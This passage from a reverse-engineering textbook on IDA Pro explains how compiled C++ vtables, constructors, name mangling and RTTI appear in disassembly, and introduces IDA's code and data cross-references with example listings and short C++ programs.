.text:004010AE call eax ; [Z]
.text:004010B0 pop ebp
.text:004010B1 retn
.text:004010B1 call_vfunc endp

5. The new operator is used for dynamic memory allocation in C++ in much the same way that
malloc is used in C (though new is built into the C++ language, where malloc is merely a standard
library function).

The vtable pointer is read from the structure at X and saved in the EDX register. Because the parameter b points to a SubClass object, this is the address of SubClass’s vtable. At Y, the vtable is indexed to read the third pointer (the address of SubClass::vfunc3 in this case) into the EAX register.

Finally, at Z, the virtual function is called.

Note that the vtable indexing operation at Y looks very much like a

structure reference operation. In fact, it is no different, and it is possible to

define a structure to represent the layout of a class’s vtable and then use the

defined structure to make the disassembly more readable, as shown here:

00000000 SubClass_vtable struc ; (sizeof=0x14)

00000000 vfunc1 dd ?

00000004 vfunc2 dd ?

00000008 vfunc3 dd ?

0000000C vfunc4 dd ?

00000010 vfunc5 dd ?

00000014 SubClass_vtable ends

This structure allows the vtable reference operation to be reformatted as

follows:

.text:004010AB mov eax, [edx+SubClass_vtable.vfunc3]
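The dispatch sequence in call_vfunc can also be mimicked by hand in C++, which may help when reading similar code. In the sketch below the compiler's hidden machinery is replaced by an explicit table of function pointers. All names (Object, VFunc, kSubVtable, and the stand-in functions with their return values) are hypothetical; real compilers generate the table and the vtable pointer for you, and their exact layout is an implementation detail.

```cpp
#include <cassert>

struct Object;                        // forward declaration
typedef int (*VFunc)(Object* self);   // every slot receives this explicitly

struct Object {
    const VFunc* vptr;   // first field: pointer to the class's vtable
    int x;
};

// Stand-ins for the member functions; each returns a recognizable value.
int base_vfunc2(Object*) { return 2; }
int base_vfunc4(Object*) { return 4; }
int sub_vfunc1(Object*)  { return 101; }
int sub_vfunc3(Object*)  { return 103; }
int sub_vfunc5(Object*)  { return 105; }

// Stand-in for SubClass's vtable: inherited slots keep the base functions.
const VFunc kSubVtable[5] = {
    sub_vfunc1, base_vfunc2, sub_vfunc3, base_vfunc4, sub_vfunc5
};

// Hand-written equivalent of b->vfunc3().
int call_vfunc(Object* b) {
    assert(b != nullptr && b->vptr != nullptr);
    const VFunc* vtable = b->vptr;   // mov edx, [eax]    (load the vtable pointer)
    VFunc target = vtable[2];        // mov eax, [edx+8]  (slot 2 is byte offset 8 with 4-byte pointers)
    return target(b);                // call eax, with this == b
}
```

An Object whose vptr is set to kSubVtable reaches sub_vfunc3 through call_vfunc, just as the SubClass object in the listing reaches SubClass::vfunc3.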

The Object Life Cycle

An understanding of the mechanism by which objects are created and

destroyed can help to reveal object hierarchies and nested object relationships as well as quickly identify class constructor and destructor functions.⁶

For global and statically allocated objects, constructors are called during

program startup and prior to entry into the main function. Constructors for

stack-allocated objects are invoked at the point the object comes into scope

within the function in which it is declared. In many cases, this will be immedi-

ately upon entry to the function in which it is declared. However, when an

object is declared within a block statement, its constructor is not invoked

until that block is entered, if it is entered at all. When an object is allocated

dynamically in the program heap, its creation is a two-step process. In the

first step, the new operator is invoked to allocate the object’s memory. In the

second step, the constructor is invoked to initialize the object. A major differ-

ence between Microsoft’s Visual C++ and GNU’s g++ is that Visual C++ ensures

that the result of new is not null prior to invoking the constructor.

6. A class constructor function is an initialization function that is invoked automatically when an

object is created. A corresponding destructor is optional and would be called when an object is no

longer in scope or similar.

When a constructor executes, the following sequence of actions takes

place:

1. If the class has a superclass, the superclass constructor is invoked.

2. If the class has any virtual functions, the vtable pointer is initialized to

point to the class’s vtable. Note that this may overwrite a vtable pointer

that was initialized in the superclass, which is exactly the desired behavior.

3. If the class has any data members that are themselves objects, then the

constructor for each such data member is invoked.

4. Finally, the code-specific constructor is executed. This is the code repre-

senting the C++ behavior of the constructor specified by the programmer.
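A source-level consequence of steps 1 and 2 is that a virtual call made from inside a superclass constructor reaches the superclass version of the function, because the subclass has not yet overwritten the vtable pointer. The sketch below demonstrates this with two hypothetical classes, Shape and Circle; the observable behavior is guaranteed by the language, while the vtable pointer explanation describes how typical compilers achieve it.

```cpp
#include <cassert>
#include <string>

struct Shape {
    std::string seen_in_ctor;
    // While this constructor runs, the object is still "only a Shape", so
    // the virtual call below resolves to Shape::name.
    Shape() { seen_in_ctor = name(); }
    virtual ~Shape() {}
    virtual std::string name() const { return "Shape"; }
};

struct Circle : Shape {
    std::string name() const override { return "Circle"; }
};

// Returns the name that the Shape constructor observed while a Circle was
// being built.
std::string name_seen_during_construction() {
    Circle c;
    assert(c.name() == "Circle");   // after construction, dispatch reaches Circle
    return c.seen_in_ctor;
}
```

Here name_seen_during_construction() yields "Shape" even though the finished object is a Circle, which is consistent with the vtable pointer being set first by the superclass constructor and then replaced by the subclass constructor.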

Constructors do not specify a return type; however, constructors gener-

ated by Microsoft Visual C++ actually return this in the EAX register. Regard-

less, this is a Visual C++ implementation detail and does not permit C++

programmers to access the returned value.

Destructors are called in essentially the reverse order. For global and static

objects, destructors are called by cleanup code that is executed after the main

function terminates. Destructors for stack-allocated objects are invoked as the

objects go out of scope. Destructors for heap-allocated objects are invoked

via the delete operator immediately before the memory allocated to the

object is released.

The actions performed by destructors mimic those performed by con-

structors, with the exception that they are performed in roughly reverse

order.

1. If the class has any virtual functions, the vtable pointer for the object is

restored to point to the vtable for the associated class. This is required in

case a subclass had overwritten the vtable pointer as part of its creation

process.

2. The programmer-specified code for the destructor executes.

3. If the class has any data members that are themselves objects, the

destructor for each such member is executed.

4. Finally, if the object has a superclass, the superclass destructor is called.
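The two sequences above can be confirmed with a short experiment that records each step as it happens. This is an illustrative sketch only: Base, Member, Derived, event_log, and run_life_cycle are hypothetical names, and the log captures the superclass, member, and programmer-written steps (vtable pointer updates are not visible at the source level).

```cpp
#include <cassert>
#include <string>
#include <vector>

// Shared log of life cycle events, in the order they occur.
std::vector<std::string>& event_log() {
    static std::vector<std::string> log;
    return log;
}

struct Member {
    Member()  { event_log().push_back("Member ctor"); }
    ~Member() { event_log().push_back("Member dtor"); }
};

struct Base {
    Base()  { event_log().push_back("Base ctor"); }
    ~Base() { event_log().push_back("Base dtor"); }
};

struct Derived : Base {
    Member m;   // a data member that is itself an object
    Derived()  { event_log().push_back("Derived ctor body"); }
    ~Derived() { event_log().push_back("Derived dtor body"); }
};

// Create and destroy one stack-allocated Derived object, returning the log.
std::vector<std::string> run_life_cycle() {
    event_log().clear();
    {
        Derived d;   // constructed on entry to the block, destroyed at its end
    }
    assert(event_log().size() == 6);
    return event_log();
}
```

The resulting log reads Base ctor, Member ctor, Derived ctor body, Derived dtor body, Member dtor, Base dtor: construction runs from the superclass inward, and destruction runs in the opposite order.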

By understanding when superclass constructors and destructors are

called, it is possible to trace an object’s inheritance hierarchy through the

chain of calls to its related superclass functions. A final point regarding vtables relates to how they are referenced within programs. There are only two circumstances in which a class’s vtable is referenced directly: within the class constructor(s) and within the destructor. When you locate a vtable, you can utilize IDA’s

data cross-referencing capabilities (see Chapter 9) to quickly locate all con-

structors and destructors for the associated class.

Name Mangling

Also called name decoration, name mangling is the mechanism C++ compilers
use to distinguish among overloaded⁷ versions of a function. In order to
generate unique names for overloaded functions, compilers decorate the
function name with additional characters used to encode various pieces of
information about the function. Encoded information typically describes the
return type of the function, the class to which the function belongs, and the
parameter sequence (type and order) required to call the function.

Name mangling is a compiler implementation detail for C++ programs
and as such is not part of the C++ language specification. Not unexpectedly,
compiler vendors have developed their own, often-incompatible conventions
for name mangling. Fortunately, IDA understands the name-mangling
conventions employed by Microsoft Visual C++ and GNU g++ as well as a few
other compilers. By default, when a mangled name is encountered within
a program, IDA displays the demangled equivalent as a comment anywhere the
name appears in the disassembly. IDA’s name-demangling options are selected
using the dialog shown in Figure 8-15, which is accessed using
Options ▸ Demangled Names.

Figure 8-15: Demangled name display options

The three principal options control whether demangled names are displayed as
comments, whether the names themselves are demangled, or whether no demangling
is performed at all. Displaying demangled names as comments results in a
display similar to the following:

.text:00401050 ; protected: __thiscall SubClass::SubClass(void)
.text:00401050 ??0SubClass@@IAE@XZ proc near ; [X]
...
.text:004010DC call ??0SubClass@@IAE@XZ ; SubClass::SubClass(void) [Y]

Likewise, displaying demangled names as names results in the following:

.text:00401050 protected: __thiscall SubClass::SubClass(void) proc near ; [X]
...
.text:004010DC call SubClass::SubClass(void) ; [Y]

where X is representative of the first line of a disassembled function and Y is
representative of a call to that function.

7. In C++, function overloading allows programmers to use the same name for several functions.
The only requirement is that each version of an overloaded function must differ from every other
version in the sequence and/or quantity of parameter types that the function receives. In other
words, each function prototype must be unique.


The Assume GCC v3.x names checkbox is used to distinguish between

the mangling scheme used in g++ version 2.9.x and that used in g++ versions

3.x and later. Under normal circumstances, IDA should automatically detect

the naming conventions in use in g++-compiled code. The Setup short

names and Setup long names buttons offer fine-grained control over the for-

matting of demangled names with a substantial number of options that are

documented in IDA’s help system.

Because mangled names carry so much information regarding the signa-

ture of each function, they reduce the time required to understand the num-

ber and types of parameters passed into a function. When mangled names

are available within a binary, IDA’s demangling capability instantly reveals

the parameter types and return types for all functions whose names are man-

gled. In contrast, for any function that does not utilize a mangled name, you

must conduct time-consuming analysis of the data flowing into and out of the

function in order to determine the signature of the function.
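Demangling is not unique to IDA. As a small illustration, the sketch below uses abi::__cxa_demangle, a function exposed by the C++ runtime that accompanies g++ (and Clang) through the <cxxabi.h> header. It handles only g++-style (version 3.x and later) names, not Microsoft's scheme, so it is not a substitute for IDA's demangler. The wrapper name demangle is our own, and the mangled strings in the usage note were written by hand to correspond to the SubClass example.

```cpp
#include <cassert>
#include <cstdlib>
#include <cxxabi.h>
#include <string>

// Returns the demangled form of a g++-style mangled name, or the input
// unchanged if the runtime cannot demangle it.
std::string demangle(const char* mangled) {
    assert(mangled != nullptr);
    int status = 0;
    // With a null output buffer, the runtime allocates the result with
    // malloc, so the caller is responsible for freeing it.
    char* text = abi::__cxa_demangle(mangled, nullptr, nullptr, &status);
    if (status != 0 || text == nullptr) {
        return mangled;
    }
    std::string result(text);
    std::free(text);
    return result;
}
```

For example, demangle("_ZN8SubClass6vfunc1Ev") produces SubClass::vfunc1(), recovering the class name, function name, and empty parameter list from the symbol alone.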

Runtime Type Identification

C++ provides operators that allow for runtime determination (typeid) and

checking (dynamic_cast) of an object’s datatype. To facilitate these opera-

tions, C++ compilers must embed type information within a program binary

and implement procedures whereby the type of a polymorphic object can be

determined with certainty regardless of the type of the pointer that may be

dereferenced to access the object. Unfortunately, as with name mangling,

Runtime Type Identification (RTTI) is a compiler implementation detail

rather than a language issue, and there is no standard means by which com-

pilers implement RTTI capabilities.

We will take a brief look at the similarities and differences between the
RTTI implementations of Microsoft Visual C++ and GNU g++. Specifically,
the only details presented here concern how to locate RTTI information
and, from there, how to learn the name of the class to which that information

pertains. Readers desiring more detailed discussion of Microsoft’s RTTI

implementation should consult the references listed at the end of this chap-

ter. In particular, the references detail how to traverse a class’s inheritance

hierarchy, including how to trace that hierarchy when multiple inheritance

is being used.

Consider the following simple program, which makes use of poly-

morphism:

class abstract_class {

public:

virtual int vfunc() = 0;

};

class concrete_class : public abstract_class {

public:

concrete_class();

int vfunc();

};

void print_type(abstract_class *p) {

cout << typeid(*p).name() << endl;

}

int main() {

abstract_class *sc = new concrete_class();

print_type(sc);

}

The print_type function must correctly print the type of the object

being pointed to by the pointer p. In this case, it is trivial to realize that

“concrete_class” must be printed based on the fact that a concrete_class

object is created in the main function. The question we answer here is: How

does print_type, and more specifically typeid, know what type of object p is

pointing to?

The answer is surprisingly simple. Since every polymorphic object con-

tains a pointer to a vtable, compilers leverage that fact by co-locating class-

type information with the class vtable. Specifically, the compiler places a

pointer immediately prior to the class vtable. This pointer points to a struc-

ture that contains information used to determine the name of the class that

owns the vtable. In g++ code, this pointer points to a type_info structure,

which contains a pointer to the name of the class. In Visual C++, the pointer

points to a Microsoft RTTICompleteObjectLocator structure, which in turn con-

tains a pointer to a TypeDescriptor structure. The TypeDescriptor structure

contains a character array that specifies the name of the polymorphic class.
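At the source level, the effect of this arrangement is that typeid and dynamic_cast report the type of the object itself rather than the type of the pointer used to reach it. The sketch below is a self-contained variant of the example classes; the virtual destructor, the inline body of vfunc, and the helper points_to_concrete are additions made for illustration. It compares type_info objects instead of printing names, because the string returned by name() differs between compilers.

```cpp
#include <cassert>
#include <typeinfo>

class abstract_class {
public:
    virtual ~abstract_class() {}
    virtual int vfunc() = 0;
};

class concrete_class : public abstract_class {
public:
    int vfunc() override { return 1; }
};

// True when p refers to an object whose dynamic type is concrete_class,
// regardless of the static type of the pointer.
bool points_to_concrete(abstract_class* p) {
    assert(p != nullptr);
    // Dereferencing a pointer to a polymorphic type makes typeid consult the
    // object's runtime type information (reached through its vtable in
    // typical implementations).
    return typeid(*p) == typeid(concrete_class);
}
```

When handed an abstract_class pointer that refers to a concrete_class object, points_to_concrete returns true, and a dynamic_cast to concrete_class* through the same pointer succeeds.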

It is important to realize that RTTI information is required only in C++

programs that use the typeid or dynamic_cast operator. Most compilers pro-

vide options to disable the generation of RTTI in binaries that do not require

it; therefore, you should not be surprised if RTTI information ever happens

to be missing.

Inheritance Relationships

If you dig deep enough into some RTTI implementations, you will find that

it is possible to unravel inheritance relationships, though you must under-

stand the compiler’s particular implementation of RTTI in order to do so.

Also, RTTI may not be present when a program does not utilize the typeid or

dynamic_cast operators. Lacking RTTI information, what techniques can be

employed to determine inheritance relationships among C++ classes?

The simplest method of determining an inheritance hierarchy is to

observe the chain of calls to superclass constructors that are called when an

object is created. The single biggest hindrance to this technique is the use of inline⁸ constructors, which leaves no call instruction to reveal that a superclass constructor has in fact been invoked.

8. In C/C++ programs a function declared as inline is treated as a macro by the compiler, and

the code for the function is expanded in place of an explicit function call. Since the presence of

an assembly language call statement is a dead giveaway that a function is being called, the use of

inline functions tends to hide the fact that a function is being used.

An alternative means for determining inheritance relationships involves

the analysis and comparison of vtables. For example, in comparing the vta-

bles shown in Figure 8-14, we note that the vtable for SubClass contains two

of the same pointers that appear in the vtable for BaseClass. We can easily

conclude that BaseClass and SubClass must be related in some way, but

which one is the base class and which one is the subclass? In such cases we

can apply the following guidelines, singly or in combination, in an attempt

to understand the nature of their relationship.

• When two vtables contain the same number of entries, the two corresponding classes may be involved in an inheritance relationship.
• When the vtable for class X contains more entries than the vtable for class Y, class X may be a subclass of class Y.
• When the vtable for class X contains entries that are also found in the vtable for class Y, then one of the following relationships must exist: X is a subclass of Y, Y is a subclass of X, or X and Y are both subclasses of a common superclass Z.
• When the vtable for class X contains entries that are also found in the vtable for class Y and the vtable for class X contains at least one purecall entry that is not also present in the corresponding vtable entry for class Y, then class Y is a subclass of class X.

While the list above is by no means all-inclusive, we can use these

guidelines to deduce the relationship between BaseClass and SubClass

in Figure 8-14. In this case, the last three rules all apply, but the last rule

specifically leads us to conclude, based on vtable analysis alone, that SubClass

inherits from BaseClass.
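The last guideline is mechanical enough to express in code. The following sketch treats each vtable as a list of symbolic slot contents, where a real analysis would compare function addresses, and applies only the purecall rule. The type and function names (Vtable, shares_entries, has_unmatched_purecall, is_subclass_by_purecall_rule) are hypothetical, and the sketch makes no attempt to handle multiple inheritance.

```cpp
#include <cassert>
#include <cstddef>
#include <string>
#include <vector>

typedef std::vector<std::string> Vtable;   // symbolic slot contents, in slot order

const std::string kPurecall = "purecall";

// True if the two tables hold the same entry in at least one common slot.
bool shares_entries(const Vtable& x, const Vtable& y) {
    const std::size_t n = x.size() < y.size() ? x.size() : y.size();
    for (std::size_t i = 0; i < n; ++i) {
        if (x[i] == y[i]) return true;
    }
    return false;
}

// True if x has a purecall slot that y does not also fill with purecall.
bool has_unmatched_purecall(const Vtable& x, const Vtable& y) {
    for (std::size_t i = 0; i < x.size(); ++i) {
        if (x[i] == kPurecall && (i >= y.size() || y[i] != kPurecall)) return true;
    }
    return false;
}

// Last guideline: the class owning vtable y is a subclass of the class
// owning vtable x.
bool is_subclass_by_purecall_rule(const Vtable& y, const Vtable& x) {
    assert(!x.empty() && !y.empty());
    return shares_entries(x, y) && has_unmatched_purecall(x, y);
}
```

Fed the two tables from Figure 8-14, is_subclass_by_purecall_rule(sub, base) holds while the reverse does not, which matches the conclusion that SubClass inherits from BaseClass.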

C++ Reverse Engineering References

For further reading on the topic of reverse engineering compiled C++, check

out these excellent references:

• Igor Skochinsky’s article “Reversing Microsoft Visual C++ Part II: Classes, Methods and RTTI,” available at http://www.openrce.org/articles/full_view/23.
• Paul Vincent Sabanal and Mark Vincent Yason’s paper “Reversing C++,” available at http://www.blackhat.com/presentations/bh-dc-07/Sabanal_Yason/Paper/bh-dc-07-Sabanal_Yason-WP.pdf.

While many of the details in each of these articles apply specifically to

programs compiled using Microsoft Visual C++, many of the concepts apply

equally to programs compiled using other C++ compilers.

Summary

You can expect to encounter complex datatypes in all but the most trivial

programs. Understanding how data within complex data structures is accessed

and knowing how to recognize clues to the layout of those complex data

structures is an essential reverse engineering skill. IDA provides a wide vari-

ety of features designed specifically to address the need to deal with complex

data structures. Familiarity with these features will greatly enhance your ability to comprehend what data is being manipulated and will allow you to spend more time understanding how and why that data is being manipulated.

In the next chapter, we round out our discussion of IDA’s basic capabili-

ties with a discussion of cross-references and graphing before moving on to

the more advanced aspects of IDA usage that set it apart from other reverse

engineering tools.

CROSS-REFERENCES AND GRAPHING

Some of the more common questions asked

while reverse engineering a binary are along

the lines of “Where is this function called from?”

and “What functions access this data?” These and other

similar questions seek to catalog the references to and

from various resources in a program. Two examples

serve to show the usefulness of such questions.

Consider the case in which you have located a function containing a stack-

allocated buffer that can be overflowed, possibly leading to exploitation of

the program. Since the function may be buried deep within a complex appli-

cation, your next step might be to determine exactly how the function can be

reached. The function is useless to you unless you can get it to execute. This

leads to the question “What functions call this vulnerable function?” as well

as additional questions regarding the nature of the data that those functions

may pass to the vulnerable function. This line of reasoning must continue as

you work your way back up potential call chains to find one that you can

influence to properly exploit the overflow that you have discovered.

In another case, consider a binary that contains a large number of ASCII

strings, at least one of which you find suspicious, such as “Executing Denial

of Service attack!” Does the presence of this string indicate that the binary

actually performs a Denial of Service attack? No, it simply indicates that the

binary happens to contain that particular ASCII sequence. You might infer

that the message is displayed somehow just prior to launching an attack; how-

ever, you need to find the related code in order to verify your suspicions.

Here the answer to the question “Where is this string referenced?” would

help you to quickly track down the program location(s) that make use of the

string. From there, you may be able to locate any actual Denial of

Service attack code.

IDA helps to answer these types of questions through its extensive cross-

referencing features. IDA provides a number of mechanisms for displaying

and accessing cross-reference data, including graph-generation capabilities

that provide a highly visual representation of the relationships between code

and data. In this chapter we discuss the types of cross-reference information

that IDA makes available, the tools for accessing cross-reference data, and

how to interpret that data.

Cross-References

We begin our discussion by noting that cross-references within IDA are often

referred to simply as xrefs. Within this text, we will use xref only where it is

used to refer to the content of an IDA menu item or dialog. In all other cases

we will stick to the term cross-reference.

There are two basic categories of cross-references in IDA: code cross-ref-

erences and data cross-references. Within each category, we will detail several

different types of cross-references. Associated with each cross-reference is

the notion of a direction. All cross-references are made from one address

to another address. The from and to addresses may be either code or data

addresses. If you are familiar with graph theory, you may choose to think of

addresses as nodes in a directed graph and cross-references as the edges in

that graph. Figure 9-1 provides a quick refresher on graph terminology. In

this simple graph, three nodes are connected by two directed edges.

Figure 9-1: Basic graph components

Note that nodes may also be referred to as vertices. Directed edges are

drawn using arrows to indicate the allowed direction of travel across the

edge. In Figure 9-1, it is possible to travel from the upper node to either of

the lower nodes, but it is not possible to travel from either of the lower nodes

to the upper node.
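
The graph view of cross-references described above can be sketched in a few lines of Python. This is only an illustrative model, not anything IDA itself exposes: the node names and the helper functions build_graph and reachable are hypothetical, chosen to mirror the three-node graph of Figure 9-1.

```python
from collections import defaultdict

def build_graph(edges):
    """Return an adjacency map {source: [targets]} for directed edges."""
    graph = defaultdict(list)
    for src, dst in edges:
        graph[src].append(dst)
    return graph

def reachable(graph, start, goal):
    """Depth-first search that follows edges only in their allowed direction."""
    stack, seen = [start], set()
    while stack:
        node = stack.pop()
        if node == goal:
            return True
        if node in seen:
            continue
        seen.add(node)
        stack.extend(graph.get(node, []))
    return False

# Hypothetical node names: one upper node with edges to two lower nodes.
edges = [("upper", "lower_left"), ("upper", "lower_right")]
graph = build_graph(edges)
print(reachable(graph, "upper", "lower_left"))   # True
print(reachable(graph, "lower_left", "upper"))   # False
```

Because each edge is stored only under its source node, travel against the direction of an arrow is impossible in this model, which is the property the figure illustrates.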

Code cross-references are a very important concept, as they facilitate

IDA’s generation of control flow graphs and function call graphs, each of which

we discuss later in the chapter.

Before we dive into the details of cross-references, it is useful to under-

stand how IDA displays cross-reference information in a disassembly listing.

Figure 9-2 shows the header line for a disassembled function (sub_401000)

containing a cross-reference as a regular comment (right side of the figure).

Figure 9-2: A basic cross-reference

The text CODE XREF indicates that this is a code cross-reference rather than

a data cross-reference (DATA XREF). An address follows, _main+2A in this case,

indicating the address from which the cross-reference originates. Note that

this is a more descriptive form of address than .text:0040154A, for example.

While both forms represent the same program location, the format used in

the cross-reference offers the additional information that the cross-reference

is being made from within the function named _main, specifically 0x2A (42)

bytes into the _main function. An up or down arrow will always follow the

address, indicating the relative direction to the referencing location. In Fig-

ure 9-2, the down arrow indicates that _main+2A lies at a higher address than

sub_401000, and thus you would need to scroll down to reach it. Similarly, an

up arrow indicates that a referencing location lies at a lower memory address,

requiring that you scroll up to reach it. Finally, every cross-reference com-

ment contains a single-character suffix to identify the type of cross-reference

that is being made. Each suffix is described later as we detail all of IDA’s

cross-reference types.
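
The anatomy of a cross-reference comment can be made concrete with a short Python sketch that splits such a comment into its parts. The comment string, the arrow characters, the p suffix, and the symbol table below are assumptions made for illustration; in particular, the start address of _main is inferred from the statement that _main+2A and .text:0040154A name the same location.

```python
import re

# Pattern for a comment such as "CODE XREF: _main+2A↓p".
# The exact layout and arrow characters are assumptions of this sketch.
XREF_RE = re.compile(
    r"(?P<kind>CODE|DATA) XREF: "
    r"(?P<name>[^+↑↓]+)"
    r"(?:\+(?P<offset>[0-9A-Fa-f]+))?"
    r"(?P<arrow>[↑↓])"
    r"(?P<suffix>[a-z])"
)

def parse_xref(comment, symbols):
    """Split a cross-reference comment into kind, source, direction, suffix."""
    m = XREF_RE.search(comment)
    if m is None:
        raise ValueError("not a cross-reference comment: %r" % comment)
    offset = int(m.group("offset") or "0", 16)
    return {
        "kind": m.group("kind").lower(),
        "source": symbols[m.group("name")] + offset,
        "direction": "down" if m.group("arrow") == "↓" else "up",
        "suffix": m.group("suffix"),
    }

symbols = {"_main": 0x401520}  # assumed: 0x40154A - 0x2A
info = parse_xref("; CODE XREF: _main+2A↓p", symbols)
print(hex(info["source"]), info["direction"], info["suffix"])
```

The name+offset form carries the same information as the raw address once the start of the named function is known, which is why the two forms are interchangeable.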

Code Cross-References

A code cross-reference is used to indicate that an instruction transfers or

may transfer control to another instruction. The manner in which instruc-

tions transfer control is referred to as a flow within IDA. IDA distinguishes

among three basic flow types: ordinary, jump, and call. Jump and call flows

are further divided according to whether the target address is a near or far

address. Far addresses are encountered only in binaries that make use of seg-

mented addresses. In the discussion that follows, we make use of the disas-

sembled version of the following program:

int read_it;        //integer variable read in main
int write_it;       //integer variable written 3 times in main
int ref_it;         //integer variable whose address is taken in main

void callflow() {}  //function called twice from main

int main() {
   int *p = &ref_it;   //results in an "offset" style data reference
   *p = read_it;       //results in a "read" style data reference
   write_it = *p;      //results in a "write" style data reference
   callflow();         //results in a "call" style code reference
   if (read_it == 3) { //results in a "jump" style code reference
      write_it = 2;    //results in a "write" style data reference
   }
   else {              //results in a "jump" style code reference
      write_it = 1;    //results in a "write" style data reference
   }
   callflow();         //results in a "call" style code reference
}

The program contains operations that will exercise all of IDA’s cross-

referencing features, as noted in the comment text.

An ordinary flow is the simplest flow type, and it represents sequential

flow from one instruction to another. This is the default execution flow for

all nonbranching instructions such as ADD. There are no special display indi-

cators for ordinary flows other than the order in which instructions are listed

in the disassembly. If instruction A has an ordinary flow to instruction B, then

instruction B will immediately follow instruction A in the disassembly listing.

In the following listing, every instruction other than X and Y has an associ-

ated ordinary flow to its immediate successor:

  .text:00401010 _main           proc near
  .text:00401010
  .text:00401010 p               = dword ptr -4
  .text:00401010
  .text:00401010                 push    ebp
  .text:00401011                 mov     ebp, esp
  .text:00401013                 push    ecx
  .text:00401014               ` mov     [ebp+p], offset ref_it
  .text:0040101B                 mov     eax, [ebp+p]
  .text:0040101E               ^ mov     ecx, read_it
  .text:00401024                 mov     [eax], ecx
  .text:00401026                 mov     edx, [ebp+p]
  .text:00401029                 mov     eax, [edx]
  .text:0040102B               _ mov     write_it, eax
  .text:00401030               Z call    callflow
  .text:00401035               ^ cmp     read_it, 3
  .text:0040103C                 jnz     short loc_40104A
  .text:0040103E               _ mov     write_it, 2
  .text:00401048               X jmp     short loc_401054
\ .text:0040104A ; -------------------------------------------------------------
  .text:0040104A
  .text:0040104A loc_40104A:                       ] ; CODE XREF: _main+2C↑j
  .text:0040104A               _ mov     write_it, 1
  .text:00401054
  .text:00401054 loc_401054:                       ] ; CODE XREF: _main+38↑j
  .text:00401054               Z call    callflow
  .text:00401059                 xor     eax, eax
  .text:0040105B                 mov     esp, ebp
  .text:0040105D                 pop     ebp
  .text:0040105E               Y retn
  .text:0040105E _main           endp

Listing 9-1: Cross-reference sources and targets

Instructions used to invoke functions, such as the x86 call instructions at

Z, are assigned a call flow, indicating transfer of control to the target func-

tion. In most cases, an ordinary flow is also assigned to call instructions, as

most functions return to the location that follows the call. If IDA believes

that a function does not return (as determined during the analysis phase),

then calls to that function will not have an ordinary flow assigned. Call flows

are noted by the display of cross-references at the target function (the desti-

nation address of the flow). The resulting disassembly of the callflow func-

tion is shown here:

.text:00401000 callflow        proc near               ; CODE XREF: _main+20↓p
.text:00401000                                         ; _main:loc_401054↓p
.text:00401000                 push    ebp
.text:00401001                 mov     ebp, esp
.text:00401003                 pop     ebp
.text:00401004                 retn
.text:00401004 callflow        endp

In this example, two cross-references are displayed at the address of

callflow to indicate that the function is called twice. The address displayed

in the cross-references is displayed as an offset into the calling function

unless the calling address has an associated name, in which case the name is

used. Both forms of addresses are used in the cross-references shown here.

Cross-references resulting from function calls are distinguished through use

of the p suffix (think P for Procedure).

A jump flow is assigned to each unconditional and conditional branch

instruction. Conditional branches are also assigned ordinary flows to account

for control flow when the branch is not taken. Unconditional branches have

no associated ordinary flow because the branch is always taken in such cases.

The dashed line break at \ is a display device used to indicate that an ordi-

nary flow does not exist between two adjacent instructions. Jump flows are

associated with jump-style cross-references displayed at the target of the jump,

as shown at ]. As with call-style cross-references, jump cross-references dis-

play the address of the referring location (the source of the jump). Jump

cross-references are distinguished by the use of a j suffix (think J for Jump).
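
The rules governing which flows leave an instruction can be summarized as a small decision function. The sketch below is a simplified model under stated assumptions: the mnemonic sets cover only a handful of x86 instructions, and the function name flows and its target_returns parameter are hypothetical rather than part of IDA.

```python
# Mnemonic sets are a small illustrative subset of x86, not a complete table.
UNCONDITIONAL_JUMPS = {"jmp"}
CONDITIONAL_JUMPS = {"jz", "jnz", "je", "jne", "ja", "jb", "jg", "jl"}
CALLS = {"call"}
RETURNS = {"ret", "retn", "retf"}

def flows(mnemonic, target_returns=True):
    """Return the set of flow types that leave an instruction."""
    m = mnemonic.lower()
    if m in UNCONDITIONAL_JUMPS:
        return {"jump"}                  # branch is always taken
    if m in CONDITIONAL_JUMPS:
        return {"jump", "ordinary"}      # falls through when not taken
    if m in CALLS:
        # The ordinary flow is dropped when the callee is known not to return.
        return {"call", "ordinary"} if target_returns else {"call"}
    if m in RETURNS:
        return set()                     # control leaves the function
    return {"ordinary"}                  # e.g. add, mov, push

for mnem in ("mov", "call", "jnz", "jmp", "retn"):
    print(mnem, sorted(flows(mnem)))
```

Only jmp and retn come back without an ordinary flow, which matches the two instructions singled out in Listing 9-1.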

Data Cross-References

Data cross-references are used to track the manner in which data is accessed

within a binary. Data cross-references can be associated with any byte in an

IDA database that is associated with a virtual address (in other words, data

cross-references are never associated with stack variables). The three most

commonly encountered types of data cross-references are used to indicate

172 Chapter 9

when a location is being read, when a location is being written, and when the

address of a location is being taken. The global variables associated with the

previous example program are shown here, as they provide several examples

of data cross-references.

.data:0040B720 read_it         dd ?                    ; DATA XREF: _main+E↑r
.data:0040B720                                         ; _main+25↑r
.data:0040B724 write_it        dd ?                    ; DATA XREF: _main+1B↑w
.data:0040B724                                       a ; _main+2E↑w ...
.data:0040B728 ref_it          db ? ;                  ; DATA XREF: _main+4↑o
.data:0040B729                 db ? ;
.data:0040B72A                 db ? ;
.data:0040B72B                 db ? ;

A read cross-reference is used to indicate that the contents of a memory loca-

tion are being accessed. Read cross-references can originate only from an

instruction address but may refer to any program location. The global vari-

able read_it is read at locations marked ^ in Listing 9-1. The associated cross-

reference comments shown in this listing indicate exactly which locations in

main are referencing read_it and are recognizable as read cross-references

based on the use of the r suffix. The first read performed on read_it is a 32-

bit read into the ECX register, which leads IDA to format read_it as a dword

(dd). In general IDA takes as many cues as it possibly can in order to deter-

mine the size and/or type of variables based on how they are accessed and

how they are used as parameters to functions.

The global variable write_it is referenced at the locations marked _

in Listing 9-1. Associated write cross-references are generated and displayed as

comments for the write_it variable, indicating the program locations that

modify the contents of the variable. Write cross-references utilize the w suffix.

Here again, IDA has determined the size of the variable based on the fact

that the 32-bit EAX register is copied into write_it. Note that the list of cross-

references displayed at write_it terminates with an ellipsis (a above), indi-

cating that the number of cross-references to write_it exceeds the current

display limit for cross-references. This limit can be modified through the

Number of displayed xrefs setting on the Cross-references tab in the

Options▸General dialog. As with read cross-references, write cross-references

can originate only from a program instruction but may reference any program location.

Generally speaking, a write cross-reference that targets a program instruction

byte is indicative of self-modifying code, which is usually considered bad form

and is frequently encountered in the de-obfuscation routines used in malware.

The third type of data cross-reference, an offset cross-reference, indicates

that the address of a location is being used (rather than the content of the

location). The address of global variable ref_it is taken at location ` in List-

ing 9-1, resulting in the offset cross-reference comment at ref_it in the

previous listing (suffix o). Offset cross-references are commonly the result

of pointer operations either in code or in data. Array access operations,

